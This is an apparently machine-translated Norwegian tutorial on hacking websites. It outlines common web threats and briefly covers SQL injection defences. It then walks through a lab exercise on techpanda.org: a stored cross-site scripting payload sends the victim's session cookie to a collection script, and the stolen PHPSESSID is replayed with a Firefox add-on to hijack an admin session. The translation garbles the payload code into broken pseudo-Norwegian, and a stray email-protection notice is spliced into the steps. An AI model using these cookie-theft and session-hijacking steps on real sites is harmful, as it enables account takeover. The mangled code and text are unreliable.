Flere mennesker har tilgang til internett enn noen gang før. Dette har bedt mange organisasjoner til å utvikle web-baserte applikasjoner som brukere kan bruke nettet til å samhandle med organisasjonen. Dårlig skrevet kode for webapplikasjoner kan utnyttes for å få uautorisert tilgang til sensitive data og webservere.

i denne opplæringen vil du lære å hacke nettsteder, og vi vil introdusere deg til web-applikasjon hacking teknikker og mottiltak du kan få på plass for å beskytte mot slike angrep.

Emner dekket i denne opplæringen

• Hva er en webapplikasjon? Hva Er Internett-Trusler?
• hvordan beskytte Ditt Nettsted mot hacks?
• Nettsted hacking triks: Hack Et Nettsted på nettet!

Hva er et webprogram? Hva Er Internett-Trusler?

en webapplikasjon (aka nettsted) er et program basert på klient-server-modellen. Serveren gir databasetilgang og forretningslogikk. Det er vert på en webserver. Klientprogrammet kjører på klientens nettleser. Webapplikasjoner er vanligvis skrevet på språk Som Java, C# og VB.Net, PHP, ColdFusion Markup Language, ETC. databasemotorene som brukes i webapplikasjoner inkluderer MySQL, MS SQL Server, PostgreSQL,SQLite, etc.

de fleste webapplikasjoner er vert på offentlige servere som er tilgjengelige Via Internett. Dette gjør dem sårbare for angrep på grunn av enkel tilgjengelighet. Følgende er vanlige webapplikasjonstrusler.

• SQL Injection-målet med denne trusselen kan være å omgå login algoritmer, sabotere data, etc.
• Denial Of Service Angrep-målet med denne trusselen kan være å nekte legitime brukere tilgang til ressursen
• Cross Site Scripting XSS-målet med denne trusselen kan være å injisere kode som kan utføres på klientsiden leseren.
• Informasjonskapsel / Øktforgiftning-målet med denne trusselen er å endre informasjonskapsler/øktdata av en angriper for å få uautorisert tilgang.
• Form Tukling-målet med denne trusselen er å endre skjema data som priser i e-handel programmer slik at angriperen kan få elementer til reduserte priser.
• Code Injection-målet med denne trusselen er å injisere kode SOM PHP, Python, etc. det kan utføres på serveren. Koden kan installere bakdører, avsløre sensitiv informasjon, etc.
• Defacement-målet med denne trusselen er å endre siden blitt vist på et nettsted og omdirigere alle sideforespørsler til en enkelt side som inneholder angriperens melding.

hvordan beskytte Nettstedet ditt mot hack?

en organisasjon kan vedta følgende policy for å beskytte seg mot webserverangrep. SQL Injection-sanitizing og validere brukerparametere før du sender dem til databasen for behandling kan bidra til å redusere sjansene for blitt angrepet via SQL Injection. Databasemotorer SOM MS SQL Server, MySQL, etc. støtte parametere, og forberedt uttalelser. De er mye tryggere enn tradisjonelle SQL – setninger

Nettsted hacking triks: Hack Et Nettsted på nettet

i denne nettsiden hacking praktisk scenario, vi kommer til å kapre bruker økten av web-applikasjon som ligger på www.techpanda.org. Vi vil bruke cross site scripting for å lese cookie session id og deretter bruke den til å utgi seg for å være en legitim bruker session.

forutsetningen er at angriperen har tilgang til webapplikasjonen, og han vil gjerne kapre øktene til andre brukere som bruker samme program. Målet med dette angrepet kan være å få admintilgang til webapplikasjonen, forutsatt at angriperens tilgangskonto er begrenset.

Komme i gang

• Åpne http://www.techpanda.org/
• for øvelsesformål anbefales det sterkt å få tilgang ved HJELP AV SQL-Injeksjon. Se denne artikkelen for mer informasjon om hvordan du gjør det.denne e-postadressen er beskyttet mot programmer som samler e-postadresser. Du må aktivere Javaskript for å kunne se den., passordet Er Password2010
• Hvis du har logget inn vellykket, så vil du få følgende dashbord

• Klikk På Legg Til Ny Kontakt
• Skriv inn følgende som fornavn

<et href=# onclick=\»dokument.plassering=\’ http://techpanda.org/snatch_sess_id.php?c=\’+escape\(dokument.informasjonskapsel\)\;\ » > Mørk</a>

her bruker

Koden ovenfor JavaScript. Det legger til en hyperkobling med en onclick-hendelse. Når intetanende brukeren klikker på linken, henter hendelsen PHP cookie session ID og sender den til snatch_sess_id.php side sammen med økt id I URL

• Skriv inn de resterende detaljene som vist nedenfor
• Klikk På Lagre Endringer

• siden SKRIPTKODEN PÅ tvers av nettstedet er lagret i databasen, vil den bli lastet hver gang brukere med tilgangsrettigheter login
• la oss anta at administratoren pålogginger og klikk På hyperkobling som sier Mørk
• Han/hun vil få vinduet med økt-id viser I URL

Merk: skriptet kan sende verdien til noen ekstern server der phpsessid er lagret Da brukeren omdirigert tilbake til nettstedet som om ingenting skjedde.

Merk: verdien du får kan være forskjellig fra den i denne websiden hacking opplæringen, men konseptet er det samme

Session Etterligning Ved Hjelp Av Firefox og Tukle data add-on

flytskjemaet nedenfor viser trinnene som du må ta for å fullføre denne øvelsen.

• Du trenger Firefox nettleser for denne delen og Tukle data add-on
• Åpne Firefox Og installere add som vist i diagrammene nedenfor

• søk etter tukle data og klikk deretter på installer som vist ovenfor

• klikk på Godta Og Installer…

• klikk På Restart nå når installasjonen er fullført
• aktiver menylinjen i firefox hvis den ikke vises

• klikk på verktøy-menyen og velg deretter tukle data som vist nedenfor

• Du får Følgende Vindu. Merk: hvis Vinduene ikke er tomme, trykk på knappen

• Klikk På Start Tamper menyen
• Bytt tilbake Til Firefox nettleser, skriv http://www.techpanda.org/dashboard.php trykk enter for å laste siden
• Du vil få følgende pop up Fra Tamper Data

• popup-vinduet har tre (3) alternativer. Alternativet Tamper lar deg endre INFORMASJONEN I HTTP-toppteksten før den sendes til serveren.
• Klikk på den
• Du vil få følgende vindu

• Kopier PHP session ID du kopierte fra angrepet URL og lim den inn etter likhetstegnet. Verdien din skal nå se slik ut

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Klikk PÅ OK knapp
• du vil få Popup-vinduet For Tamperdata igjen

• FJERN MERKET I BOKSEN SOM BER FORTSETTE TUKLING?
• Klikk på send-knappen når du er ferdig
• du skal kunne se dashbordet som vist nedenfor

Merk: vi logget ikke inn, vi etterlignet en påloggingsøkt ved HJELP AV PHPSESSID-verdien vi hentet ved hjelp av cross site scripting

Sammendrag

• en webapplikasjon er basert på server-klientmodellen. Klientsiden bruker nettleseren til å få tilgang til ressursene på serveren.
• Webapplikasjoner er vanligvis tilgjengelige over internett. Dette gjør dem sårbare for angrep.
• webapplikasjonstrusler inkluderer SQL-Injeksjon, Kodeinjeksjon, XSS, Defacement, Cookie forgiftning, etc.
• en god sikkerhetspolitikk når du utvikler webapplikasjoner kan bidra til å gjøre dem sikre.